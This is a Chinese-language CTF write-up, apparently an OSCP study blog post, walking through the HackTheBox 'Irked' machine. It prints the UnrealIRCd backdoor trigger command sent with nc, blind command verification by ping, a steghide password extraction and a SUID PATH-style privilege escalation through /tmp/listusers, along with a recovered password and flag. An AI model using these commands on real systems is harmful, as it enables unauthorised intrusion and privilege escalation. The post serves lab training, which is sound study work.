OSCP备考_0x12_HackThBox靶机_Linux_irked

Ethan医生4个月前靶场122

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)

image.png



nmap -sU --top-ports 100 10.129.213.7 (扫描UDP)


image.png



UnrealIRCd

    查看是否有后门漏洞

    nmap -p 6667,6697,8067,65534 --script irc-unrealircd-backdoor 10.129.213.7 

image.png



    echo -e "AB;id\n" | nc 10.129.213.7  8067

命令解释

  • echo -e "AB;id\n":生成一个字符串,其中 AB; 是触发后门的特殊前缀,id 是要执行的命令

  • |:管道符,将前一个命令的输出作为后一个命令的输入

  • nc 10.10.10.117 8067:使用 netcat 连接到目标 IP 的 8067 端口

没有回显,可能就是无法回显,尝试在没有回显的情况下验证漏洞

echo -e "AB; ping -c 1 10.10.16.26\n" | nc 10.10.10.117 8067

本地监听

tcpdump -ni tun0 icmp


image.png

image.png

到home底下有djmardov 没法直接查看user.txt

image.png

经过一连串搜索发现Documents底下有.backup挡案

cat .backup

Super elite steg backup pw

UPupDOWNdownLRlrBAbaSSss


image.png

steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss 

image.png

image.png

Kab6h+m+bbp2J:HG

image.png

提权发现suid有

/usr/bin/viewuser 可疑文件

image.png

发现没找到SH

echo sh > /tmp/listusers 直接写入

image.png




b52f698299c54635b5dae46a6f0efa5b

标签: OSCP

相关文章

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x32_HackThBox靶机_Passage

OSCP备考_0x32_HackThBox靶机_Passage

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x47_HackThBox靶机_Windows_conceal

OSCP备考_0x47_HackThBox靶机_Windows_conceal

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.122 (扫描TCP)我们普通的tcp啥都没有,所以考虑udp扫描当然也有可能是...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。